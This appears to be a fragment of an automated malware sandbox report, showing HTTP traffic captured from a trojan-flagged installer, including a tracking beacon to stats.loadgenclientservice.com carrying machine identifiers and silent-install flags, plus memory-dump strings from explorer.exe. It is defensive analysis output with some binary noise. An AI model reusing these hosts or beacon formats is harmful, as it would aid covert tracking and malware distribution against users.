GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 20 Sep 2014 18:23:19 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1411237399.dop012.am4.t,1411237399.cds058.am4.c..GIF89a.............,...........D..;..
GET /ThawteTimestampingCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.thawte.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "67d0ac3389aba998bf71f5ac72d60648:1403244909"
Last-Modified: Fri, 20 Jun 2014 06:15:09 GMT
Accept-Ranges: bytes
Content-Length: 341
Date: Sat, 20 Sep 2014 18:23:24 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..140617000000Z..140930235959Z0...*.H...............pe..y.....$.{_... .}["....`4..>p}.........e..*?AC..kVA..$..l.j}......Z.&.]V.7.G}..=.G.xm'M.{......;...~...... ^.....caK.Hq..kHTTP/1.1 200 OK..Server: Apache..ETag: "67d0ac3389aba998bf71f5ac72d60648:1403244909"..Last-Modified: Fri, 20 Jun 2014 06:15:09 GMT..Accept-Ranges: bytes..Content-Length: 341..Date: Sat, 20 Sep 2014 18:23:24 GMT..Connection: keep-alive..Content-Type: application/pkix-crl..0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..140617000000Z..140930235959Z0...*.H...............pe..y.....$.{_... .}["....`4..>p}.........e..*?AC..kVA..$..l.j}......Z.&.]V.7.G}..=.G.xm'M.{......;...~...... ^.....caK.Hq..k..
GET /installer_updates/000803/update.json HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: update.loadgenclientservice.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 18:23:18 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1393779143"
Last-Modified: Sun, 02 Mar 2014 16:52:23 GMT
Cache-Control: max-age=5448
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
X-HW: 1411237398.dop019.am4.t,1411237398.cds041.am4.c
{"update_from_version":"NA","url":"NA"}HTTP/1.1 200 OK..Date: Sat, 20 Sep 2014 18:23:18 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1393779143"..Last-Modified: Sun, 02 Mar 2014 16:52:23 GMT..Cache-Control: max-age=5448..Content-Length: 39..Content-Type: text/plain; charset=UTF-8..X-HW: 1411237398.dop019.am4.t,1411237398.cds041.am4.c..{"update_from_version":"NA","url":"NA"}..
GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380 HTTP/1.1
Host: stats.loadgenclientservice.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: wpyGmXlK9QCYJs/MYBaiiF1JmcZlegVGO0hWkBCFHoVkwxj80d Swm4m91R1z1fb
x-amz-request-id: 832AD7C14E8B127B
Date: Sat, 20 Sep 2014 18:23:20 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:04:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: wpyGmXlK9QCYJs/MYBaiiF1JmcZlegVGO0hWkBCFHoVkwxj80d Swm4m91R1z1fb..x-amz-request-id: 832AD7C14E8B127B..Date: Sat, 20 Sep 2014 18:23:20 GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Tue, 25 Feb 2014 00:04:39 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_1140_rwx_00FF0000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
Explorer.EXE_1140_rwx_01E00000_00001000:
|explorer.exeM_1140_
|explorer.exeM_1140_